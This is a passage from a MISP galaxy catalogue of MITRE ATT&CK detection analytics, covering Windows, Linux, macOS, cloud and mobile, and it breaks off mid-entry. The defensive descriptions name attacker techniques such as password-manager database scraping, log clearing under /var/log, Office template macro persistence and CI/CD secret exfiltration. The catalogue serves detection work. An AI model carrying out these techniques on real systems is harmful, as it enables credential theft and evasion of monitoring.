Behavioral chain: (1) sshd or federated SSO logins from third-party networks or identities; (2) rapid sudo/su privilege elevation; (3) access to sensitive paths or east-west SSH. Correlate auth logs, process execution, and network flows.

Internal MISP references

UUID e19cbf11-fabf-4dfd-aeb2-1c62660ebd8f which can be used as unique global reference for Analytic 1345 - AN1345 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1345
mitre_platforms ['Linux']

Analytic 1453 - AN1453

Execution of system enumeration commands such as uname, df, uptime, hostname, lscpu, and cat /etc/os-release through local terminal or scripts.

Internal MISP references

UUID eca769c3-9497-4c87-b624-4003fd1b0304 which can be used as unique global reference for Analytic 1453 - AN1453 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1453
mitre_platforms ['Linux']

Analytic 1543 - AN1543

Detection of compromised or misused valid accounts via anomalous logon patterns, abnormal logon types, and inconsistent geographic or time-based activity across Windows endpoints.

Internal MISP references

UUID f9c3a686-2894-498d-9d04-7ac510752e1f which can be used as unique global reference for Analytic 1543 - AN1543 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1543
mitre_platforms ['Windows']

Analytic 1364 - AN1364

Monitor SaaS financial systems (e.g., QuickBooks, Workday, SAP S/4HANA cloud) for unauthorized access, rule changes, or mass export of financial data. Detect anomalous transfers initiated via SaaS APIs or new MFA-disabled logins targeting finance apps.

Internal MISP references

UUID 3bac57c4-1539-4048-b325-88032c78ed08 which can be used as unique global reference for Analytic 1364 - AN1364 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1364
mitre_platforms ['SaaS']

Analytic 1463 - AN1463

Execution of user-downloaded or created scripts whose extensions are hidden by RTLO character insertion in the filename, often seen in desktop environments or phishing campaigns.

Internal MISP references

UUID 7a72f91d-9c16-4724-b87d-3e5448f81b51 which can be used as unique global reference for Analytic 1463 - AN1463 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1463
mitre_platforms ['Linux']

Analytic 1346 - AN1346

Behavioral chain: (1) third-party interactive login or mobileconfig-based device enrollment; (2) privilege use or admin group change; (3) lateral movement mounts/ssh. Correlate unified logs and network telemetry.

Internal MISP references

UUID 7c28e2f5-c944-4974-810f-81bcfdc8b6cc which can be used as unique global reference for Analytic 1346 - AN1346 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1346
mitre_platforms ['macOS']

Analytic 1436 - AN1436

Adversaries inject VBA macros into Office templates such as Normal.dotm or Personal.xlsb, or redirect the Office template load path via the GlobalDotName registry key, to gain persistence. Template macros trigger execution of malicious code on application startup.

Internal MISP references

UUID 85b4c967-56bc-4990-b3e2-7e40f3ef1852 which can be used as unique global reference for Analytic 1436 - AN1436 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1436
mitre_platforms ['Windows']

Analytic 1643 - AN1643

Detection of password manager database access (1Password .opvault, LastPass caches, KeePass .kdbx) outside expected parent processes. Identifies memory scraping attempts via suspicious API calls or tools attaching to password manager processes.

Internal MISP references

UUID de1d4807-fcb5-4112-b310-ea0c4df45af2 which can be used as unique global reference for Analytic 1643 - AN1643 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1643
mitre_platforms ['macOS']

Analytic 1634 - AN1634

Detects kernel- or user-space exploitation attempts targeting auditd, AV daemons, or security monitoring agents. Defender observation includes unexpected segfaults, privilege escalation attempts from low-privileged processes, or modifications to security binaries. Correlates exploitation attempts with subsequent gaps in logging or terminated processes.

Internal MISP references

UUID ecf26d05-48ef-43b2-bfc3-4ea331be735b which can be used as unique global reference for Analytic 1634 - AN1634 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1634
mitre_platforms ['Linux']

Analytic 1473 - AN1473

Detects anomalous CI/CD workflow execution originating from forked repositories, with pull request (PR) metadata or commit messages containing suspicious patterns (e.g., encoded payloads), coupled with the use of insecure pipeline triggers like pull_request_target or excessive API usage of CI/CD secrets. Correlation with unusual artifact generation or secret exfiltration via encoded or external network destination URLs confirms suspicious behavior.

Internal MISP references

UUID 0391c880-fcb3-457f-b625-18f9453659b8 which can be used as unique global reference for Analytic 1473 - AN1473 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1473
mitre_platforms ['SaaS']

Analytic 1437 - AN1437

Malicious VBA macros embedded in base templates like Normal.dotm or Personal.xlsb are automatically loaded and executed at startup. Template path may be hijacked to load a remote or attacker-controlled template via GlobalDotName registry setting.

Internal MISP references

UUID 17bc7c97-7322-4619-84c5-50e45aa6627d which can be used as unique global reference for Analytic 1437 - AN1437 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1437
mitre_platforms ['Office Suite']

Analytic 1374 - AN1374

Detection of adversaries modifying startup configuration files to disable signature verification, logging, or monitoring features.

Internal MISP references

UUID e542342f-5a08-408d-b292-797bcb2da5eb which can be used as unique global reference for Analytic 1374 - AN1374 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1374
mitre_platforms ['Network Devices']

Analytic 1347 - AN1347

Behavioral chain: (1) delegated admin or external identity establishes session (e.g., partner/reseller DAP, B2B guest, SAML/OAuth trust); (2) role elevation or app consent/permission grant; (3) downstream privileged actions in the tenant. Correlate IdP sign-in, admin/role assignment, and consent/admin-on-behalf events.

Internal MISP references

UUID f0e2baa2-3bb7-4587-8eae-6abddd1cf140 which can be used as unique global reference for Analytic 1347 - AN1347 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1347
mitre_platforms ['Identity Provider']

Analytic 1734 - AN1734

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 4773bc29-5272-45d5-92bd-b24a34b16df6 which can be used as unique global reference for Analytic 1734 - AN1734 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1734
mitre_platforms ['Android']

Analytic 1743 - AN1743

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques that ensure an intent can only be sent to an appropriate destination (e.g., using explicit rather than implicit intents, checking permissions, checking the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practices.(Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open a URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID 9253e546-bc55-42c1-bf8c-b4337a1ea5b5 which can be used as unique global reference for Analytic 1743 - AN1743 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1743
mitre_platforms ['Android']

Analytic 1483 - AN1483

Processes such as plink.exe, ssh.exe, or netsh.exe establishing outbound network connections where traffic patterns show encapsulated protocols (e.g., RDP over SSH). Defender observations include anomalous process-to-network relationships, large asymmetric data flows, and port usage mismatches.

Internal MISP references

UUID 64c6aa46-a824-4c8e-8462-d0a58b78acfb which can be used as unique global reference for Analytic 1483 - AN1483 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1483
mitre_platforms ['Windows']

Analytic 1438 - AN1438

Detects log-clearing behavior by correlating suspicious command execution targeting log files under /var/log/, anomalous deletions or truncations of system logs, and unusual child processes (e.g., shell pipelines or redirections).

Internal MISP references

UUID 6ffa0db8-a088-4e7a-b8e5-50a204762cca which can be used as unique global reference for Analytic 1438 - AN1438 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1438
mitre_platforms ['Linux']

Analytic 1348 - AN1348

Behavioral chain: (1) cross-account or third-party principal assumes a role into the tenant/subscription/project; (2) privileged API calls are made in short succession; (3) access originates from unfamiliar networks or geos. Correlate assume-role/federation events with sensitive API usage.

Internal MISP references

UUID c526f8c1-95ec-494f-b7bf-49a95a803f2a which can be used as unique global reference for Analytic 1348 - AN1348 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1348
mitre_platforms ['IaaS']

Analytic 1384 - AN1384

Abuse of file/registry attributes to hide malicious files, directories, or services. Defender view: detection of attrib.exe setting hidden/system flags, creation of Alternate Data Streams, or registry keys altering file visibility.

Internal MISP references

UUID e01b29cd-2369-4ad5-bd91-98994f36cd1e which can be used as unique global reference for Analytic 1384 - AN1384 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1384
mitre_platforms ['Windows']

Analytic 1843 - AN1843

Unexpected behavior from an application could be an indicator of masquerading. Application vetting services may potentially determine if an application contains suspicious code and/or metadata.

Internal MISP references

UUID b6d679b6-0777-4541-874c-d81f37d8fb07 which can be used as unique global reference for Analytic 1843 - AN1843 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1843
mitre_platforms ['Android']

Analytic 1834 - AN1834

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID ea9bb66e-1ced-4448-8d64-4184ae1c0ac9 which can be used as unique global reference for Analytic 1834 - AN1834 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1834
mitre_platforms ['iOS']

Analytic 1349 - AN1349

Behavioral chain: (1) third-party app or admin connects via OAuth/marketplace install; (2) high-privilege scopes granted; (3) anomalous actions (mass read/exports, admin changes).

Internal MISP references

UUID 4766bdc0-047a-4250-93c1-6d907178620e which can be used as unique global reference for Analytic 1349 - AN1349 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1349
mitre_platforms ['SaaS']

Analytic 1943 - AN1943

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 746ebd79-2d1f-4e58-8bdb-b49a236a9642 which can be used as unique global reference for Analytic 1943 - AN1943 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1943
mitre_platforms ['PRE']

Analytic 1493 - AN1493

Unauthorized instance creation in unmonitored or unused regions. Burst of compute-intensive jobs in spot instances or sudden spike in resource usage in legitimate VMs.

Internal MISP references

UUID 7a5e5aff-8395-4b4e-9072-dd765dae7d19 which can be used as unique global reference for Analytic 1493 - AN1493 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1493
mitre_platforms ['IaaS']

Analytic 1439 - AN1439

Detects adversary clearing log files on macOS by correlating calls to shell utilities (e.g., echo >, rm, truncate) targeting files in /var/log/ with unusual context (non-administrative users or abnormal process lineage).

Internal MISP references

UUID b4e2440e-8956-4ae6-94cb-da859f407f27 which can be used as unique global reference for Analytic 1439 - AN1439 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1439
mitre_platforms ['macOS']

Analytic 1394 - AN1394

Detection of command-line activity exhibiting syntactic obfuscation patterns, such as excessive escape characters, base64 encoding, command concatenation, or outlier command length and entropy.

Internal MISP references

UUID e6e98024-2fa7-444c-af90-32ec5d4d2666 which can be used as unique global reference for Analytic 1394 - AN1394 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1394
mitre_platforms ['Windows']

Analytic 1355 - AN1355

Execution of system utilities like 'system_profiler' and 'ioreg' to enumerate hardware components or USB devices, particularly if followed by clipboard, file, or network activity.

Internal MISP references

UUID 479e5749-a746-4b17-9543-ca4b9d41576a which can be used as unique global reference for Analytic 1355 - AN1355 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1355
mitre_platforms ['macOS']

Analytic 1553 - AN1553

macOS environmental validation behavioral chain: (1) system profiling through system_profiler, sysctl, and hardware discovery commands; (2) network interface and configuration enumeration for geolocation and network environment validation; (3) application installation and version discovery for software environment fingerprinting; (4) security feature detection (SIP, Gatekeeper, XProtect status); (5) conditional payload execution based on macOS-specific environmental criteria and System Integrity Protection bypass validation.

Internal MISP references

UUID 65abf5f4-ddb9-4eac-a926-1bef5d6b5c63 which can be used as unique global reference for Analytic 1553 - AN1553 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1553
mitre_platforms ['macOS']

Analytic 1535 - AN1535

MSBuild.exe is invoked outside expected developer/build contexts or with anomalous arguments (e.g., non-canonical paths, remote shares, Base64/obfuscated property values). Within a short window, it (a) spawns high-risk LOLBins/script interpreters, (b) writes new PE/DLL/script artifacts into user-writable paths and executes them, (c) loads unsigned/user-writable modules, (d) performs memory injection/thread creation into other processes, and/or (e) initiates outbound network connections.

Internal MISP references

UUID e24b6c08-4fd0-40c7-a71a-762cc08d6085 which can be used as unique global reference for Analytic 1535 - AN1535 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1535
mitre_platforms ['Windows']

Analytic 1365 - AN1365

Monitor email and document management systems for fraudulent invoices, impersonation of vendors, or BEC-style payment redirections. Detect abnormal editing of invoice templates, or emails containing known fraud language combined with attachment delivery.

Internal MISP references

UUID 03364dc1-4b76-4a30-83cf-ae101b960d8e which can be used as unique global reference for Analytic 1365 - AN1365 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1365
mitre_platforms ['Office Suite']

Analytic 1356 - AN1356

Defenders should monitor for anomalous or unauthorized changes to cloud compute configurations that alter quotas, tenant-wide policies, subscription associations, or allowed deployment regions. From a defender’s perspective, suspicious behavior chains include a sudden increase in compute quota requests followed by new instance or resource creation, policy modifications that weaken security restrictions, or enabling previously unused/unsupported cloud regions. Correlation across identity, configuration, and subsequent provisioning logs is critical to distinguish legitimate administrative activity from adversarial abuse.

Internal MISP references

UUID 193f0293-0a53-430f-83c0-a69d0663479a which can be used as unique global reference for Analytic 1356 - AN1356 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1356
mitre_platforms ['IaaS']

Analytic 1635 - AN1635

Detects exploitation of macOS security and integrity services, such as Gatekeeper, XProtect, or EDR agents. Defender observations include unsigned processes attempting privileged operations, abnormal termination of security daemons, or modification of system integrity logs.

Internal MISP references

UUID 88d9dbea-cc85-4c94-a368-e5c1a603854b which can be used as unique global reference for Analytic 1635 - AN1635 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1635
mitre_platforms ['macOS']

Analytic 1536 - AN1536

Registry key modification to AppInit_DLLs value followed by anomalous DLL loading by processes importing user32.dll, especially unsigned or uncommon DLLs, suggesting unauthorized AppInit persistence or privilege escalation.

Internal MISP references

UUID e886b9c8-2187-4363-9043-1e5c60d75363 which can be used as unique global reference for Analytic 1536 - AN1536 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1536
mitre_platforms ['Windows']

Analytic 1563 - AN1563

Execution of commands to query system locale and language settings, such as 'defaults read -g AppleLocale' or 'systemsetup -gettimezone'. Unusual parent processes or execution contexts of these commands may indicate adversarial discovery.

Internal MISP references

UUID ffc71b21-982b-4fc7-8276-bd679d67bc95 which can be used as unique global reference for Analytic 1563 - AN1563 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1563
mitre_platforms ['macOS']

Analytic 1653 - AN1653

Integrity checking mechanisms can potentially detect unauthorized hardware modifications.

Internal MISP references

UUID 9e2b0e14-eabd-4eb7-93b0-da238e3786db which can be used as unique global reference for Analytic 1653 - AN1653 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1653
mitre_platforms ['Android']

Analytic 1357 - AN1357

Detects anomalous use of COM, DDE, or named pipes for execution. Correlates creation or access of IPC mechanisms (e.g., named pipes, COM objects) with unusual parent-child process relationships or code injection patterns (e.g., Office spawning cmd.exe via DDE).

Internal MISP references

UUID 0c6a8e7a-f9d0-479a-88c1-4ce26edba81c which can be used as unique global reference for Analytic 1357 - AN1357 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1357
mitre_platforms ['Windows']

Analytic 1537 - AN1537

Detects suspicious use of ESXi native CLI tools like esxcli and vim-cmd by unauthorized users or outside expected maintenance windows. Focus is on actions such as stopping VMs, reconfiguring network/firewall settings, and enabling SSH or logging.

Internal MISP references

UUID 2fa4d134-8583-4cbe-bc84-bfc799205116 which can be used as unique global reference for Analytic 1537 - AN1537 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1537
mitre_platforms ['ESXi']

Analytic 1573 - AN1573

Applications or scripts invoking cloud storage APIs (Dropbox sync, iCloud, Google Drive client) in unexpected contexts. Defender perspective: detect sensitive file reads by non-standard applications followed by unusual encrypted uploads to external cloud storage domains.

Internal MISP references

UUID 535e9bc8-b033-4aee-88e1-bd48699b7856 which can be used as unique global reference for Analytic 1573 - AN1573 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1573
mitre_platforms ['macOS']

Analytic 1375 - AN1375

A process creates a brand-new logon session/token (LogonUser/LsaLogonUser) and then assigns/impersonates it (SetThreadToken/ImpersonateLoggedOnUser) to run actions under that freshly created security context. Chain: (1) suspicious command or script block (e.g., runas /netonly, PowerShell P/Invoke of LogonUser) → (2) ETW/API evidence of LogonUser/SetThreadToken → (3) Security 4624 New Logon (often LogonType=9 NewCredentials, or 2/3 from a non-interactive parent) with no interactive desktop → (4) Sysmon Event ID 1 process(es) executing with a new LogonId/SID different from the parent process → (5) optional privileged operations/lateral movement.

Internal MISP references

UUID 6eab700a-548f-48aa-8821-163682fe8bbe which can be used as unique global reference for Analytic 1375 - AN1375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1375
mitre_platforms ['Windows']

Analytic 1735 - AN1735

Application vetting services may detect when an application requests permissions after an application update. Application vetting services may look for indications that the application’s update includes malicious code at runtime. Application vetting services may be able to list domains and/or IP addresses that applications communicate with.

Internal MISP references

UUID 3fe80400-0e8c-4ffa-8233-cebf7511613c which can be used as unique global reference for Analytic 1735 - AN1735 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1735
mitre_platforms ['Android']

Analytic 1753 - AN1753

Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.

Internal MISP references

UUID b2120e89-a453-4575-8458-7700ea59f85a which can be used as unique global reference for Analytic 1753 - AN1753 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1753
mitre_platforms ['Android']

Analytic 1385 - AN1385

Hidden file creation using leading '.' or file attribute changes with chattr (immutable/hidden flags). Defender view: detect execution of chattr, lsattr anomalies, and unusual hidden files appearing in system directories.

Internal MISP references

UUID 2c3ec402-b9e9-4091-a04d-3b73f260e669 which can be used as unique global reference for Analytic 1385 - AN1385 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1385
mitre_platforms ['Linux']

Analytic 1583 - AN1583

Execution of network enumeration utilities (e.g., net.exe, ping.exe, tracert.exe) in short succession, often chained with lateral movement tools or system enumeration commands.

Internal MISP references

UUID 498eb889-4468-4c55-9337-df219d5f142b which can be used as unique global reference for Analytic 1583 - AN1583 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1583
mitre_platforms ['Windows']

Analytic 1538 - AN1538

Correlate process execution of shutdown/reboot commands (e.g., shutdown.exe, restart-computer) with host status change logs (Event IDs 1074, 6006) and absence of related administrative context (e.g., user not in Helpdesk group).

Internal MISP references

UUID 52b9bf67-304e-403f-9b81-4d4b9d974ad6 which can be used as unique global reference for Analytic 1538 - AN1538 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1538
mitre_platforms ['Windows']

Analytic 1358 - AN1358

Detects abuse of UNIX domain sockets, pipes, or message queues for unauthorized code execution. Correlates unexpected socket creation with suspicious binaries, abnormal shell pipelines, or injected processes establishing IPC channels.

Internal MISP references

UUID ae8e028c-2c3a-4ac0-964f-d0b59533190d which can be used as unique global reference for Analytic 1358 - AN1358 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1358
mitre_platforms ['Linux']

Analytic 1835 - AN1835

Mobile security products can use attestation to detect compromised devices.

Internal MISP references

UUID b6618b3a-370c-44af-86db-d4640799ed6e which can be used as unique global reference for Analytic 1835 - AN1835 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1835
mitre_platforms ['Android']

Analytic 1853 - AN1853

Application vetting services can detect malicious code in applications. System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.

Internal MISP references

UUID b95bc556-c98c-459e-9327-49830ce9c77c which can be used as unique global reference for Analytic 1853 - AN1853 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1853
mitre_platforms ['Android']

Analytic 1359 - AN1359

Detects anomalous use of Mach ports, Apple Events, or XPC services for inter-process execution or code injection. Focuses on unexpected processes attempting to send privileged Apple Events (e.g., automation scripts injecting into security-sensitive apps).

Internal MISP references

UUID 3f42390d-2a44-4094-9cea-429f1286f8aa which can be used as unique global reference for Analytic 1359 - AN1359 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1359
mitre_platforms ['macOS']

Analytic 1953 - AN1953

Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown or otherwise suspicious accounts). Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for the respective protocol(s)).

Internal MISP references

UUID 5880eb25-eec5-4b40-a3fa-6a3c633a3e56 which can be used as unique global reference for Analytic 1953 - AN1953 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1953
mitre_platforms ['PRE']

Analytic 1395 - AN1395

Detection of shell commands that leverage encoded execution, command chaining, excessive piping, or unusual token patterns indicative of obfuscation.

Internal MISP references

UUID cad9e775-f40f-42fb-8e86-c7aba249a8e4 which can be used as unique global reference for Analytic 1395 - AN1395 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1395
mitre_platforms ['Linux']

Analytic 1593 - AN1593

Unexpected modification of the KernelCallbackTable in a process’s PEB followed by invocation of modified callback functions (e.g., fnCOPYDATA) through Windows messages. Defender observes suspicious API call chains such as NtQueryInformationProcess → WriteProcessMemory → abnormal GUI callback execution, often correlating to anomalous process behavior such as network activity or code injection.

Internal MISP references

UUID da853af7-f2e4-45c2-b78f-3d960fff638e which can be used as unique global reference for Analytic 1593 - AN1593 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1593
mitre_platforms ['Windows']

Analytic 1539 - AN1539

Detect 'shutdown', 'reboot', or 'systemctl poweroff' executions with auditd/syslog and absence of scheduled maintenance windows or approved user context.

Internal MISP references

UUID f1a019df-12f0-442e-9b0e-b1a82352389b which can be used as unique global reference for Analytic 1539 - AN1539 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1539
mitre_platforms ['Linux']

Analytic 1636 - AN1636

Detects exploitation of IaaS cloud security boundaries to evade defense controls. Defender perspective includes anomalous API calls that bypass audit logging, disable monitoring, or manipulate guardrails (e.g., CloudTrail tampering). Correlation highlights when exploitation attempts precede sudden absence of expected telemetry.

Internal MISP references

UUID 458038e6-60a2-47d2-bd55-675e77f0e279 which can be used as unique global reference for Analytic 1636 - AN1636 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1636
mitre_platforms ['IaaS']

Analytic 1366 - AN1366

Chain of remote access tool behavior: (1) initial execution of remote-control/assist agent or GUI under user context; (2) persistence via service or autorun; (3) long-lived outbound connection/tunnel to external infrastructure; (4) interactive control signals such as shell or file-manager child processes spawned by the RAT parent.

Internal MISP references

UUID ba2056ee-77d7-49d4-a993-5806506964df which can be used as unique global reference for Analytic 1366 - AN1366 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1366
mitre_platforms ['Windows']

Analytic 1663 - AN1663

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block one-way command and control traffic.

Internal MISP references

UUID ddebe043-2017-44ba-96e5-cbe87916511b which can be used as unique global reference for Analytic 1663 - AN1663 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1663
mitre_platforms ['Android']

Analytic 1637 - AN1637

Detects adversary abuse of SaaS platform vulnerabilities to bypass logging, monitoring, or consent boundaries. Defender perspective focuses on abnormal application integration events, missing audit logs, or API calls from unauthorized service principals that align with exploitation attempts.

Internal MISP references

UUID 77c3b78a-fb34-4040-9dda-057e8eca3362 which can be used as unique global reference for Analytic 1637 - AN1637 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1637
mitre_platforms ['SaaS']

Analytic 1367 - AN1367

Sequence of RAT agent execution, systemd persistence, and long-lived external egress; optional interactive shells spawned from the agent.

Internal MISP references

UUID d90a4f16-b5e1-4daa-bf65-91112fe02761 which can be used as unique global reference for Analytic 1367 - AN1367 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1367
mitre_platforms ['Linux']

Analytic 1376 - AN1376

Establishing network connections on uncommon ports or protocols following C2 disruption or blocking. Often executed by processes that typically exhibit no network activity.

Internal MISP references

UUID fcb2ed1a-2f39-47e8-9524-95ceac0ff383 which can be used as unique global reference for Analytic 1376 - AN1376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1376
mitre_platforms ['Windows']

Analytic 1736 - AN1736

Application vetting services may detect when an application requests permissions after an application update. Application vetting services may look for indications that the application’s update includes malicious code at runtime. Application vetting services may be able to list domains and/or IP addresses that applications communicate with.

Internal MISP references

UUID 095c16b2-3d9a-445a-82a4-fa7affd928f5 which can be used as unique global reference for Analytic 1736 - AN1736 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1736
mitre_platforms ['iOS']

Analytic 1763 - AN1763

Since data encryption is a common practice in many legitimate applications and uses standard, language-specific programming APIs, encrypting data for command and control communication is regarded as undetectable by the user.

Internal MISP references

UUID 4b4a369c-35aa-4389-a218-2034fb043041 which can be used as unique global reference for Analytic 1763 - AN1763 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1763
mitre_platforms ['iOS']

Analytic 1673 - AN1673

Application vetting services could look for applications attempting to read android.os.SystemProperties or to run getprop via the runtime exec() command. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID 5044447d-dc82-4d74-ac8c-02e5559f374c which can be used as unique global reference for Analytic 1673 - AN1673 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1673
mitre_platforms ['Android']

Analytic 1386 - AN1386

Hidden files via 'chflags hidden' or Apple-specific attributes, LaunchAgents/LaunchDaemons placed in non-standard hidden directories. Defender view: detect command execution modifying file flags and unusual plist creation in hidden paths.

Internal MISP references

UUID 8963772e-2ee5-421e-aec0-b952d05d4efc which can be used as unique global reference for Analytic 1386 - AN1386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1386
mitre_platforms ['macOS']

Analytic 1368 - AN1368

Electron/GUI or headless RAT execution followed by LaunchAgent/Daemon persistence and persistent external connections; interactive children (osascript/sh/curl) spawned by parent.

Internal MISP references

UUID 97f27df6-5041-437b-9aeb-58a9bc33a376 which can be used as unique global reference for Analytic 1368 - AN1368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1368
mitre_platforms ['macOS']

Analytic 1638 - AN1638

SSH login from a remote system (via sshd), followed by user context execution of suspicious binaries or privilege escalation behavior.

Internal MISP references

UUID bcc6bec5-63c7-4084-9d2f-da8b58d0f621 which can be used as unique global reference for Analytic 1638 - AN1638 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1638
mitre_platforms ['Linux']

Analytic 1836 - AN1836

Mobile security products can use attestation to detect compromised devices.

Internal MISP references

UUID 0b0e244e-9386-4520-b030-9e330c6c1930 which can be used as unique global reference for Analytic 1836 - AN1836 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1836
mitre_platforms ['iOS']

Analytic 1683 - AN1683

Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.

Internal MISP references

UUID 7f84f2b8-6ef3-4167-b059-a455d7c40a7d which can be used as unique global reference for Analytic 1683 - AN1683 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1683
mitre_platforms ['Android']

Analytic 1396 - AN1396

Detection of obfuscated commands via shell, osascript, or AppleScript interpreters using unusual tokens, encoding, variable substitution, or runtime string reconstruction.

Internal MISP references

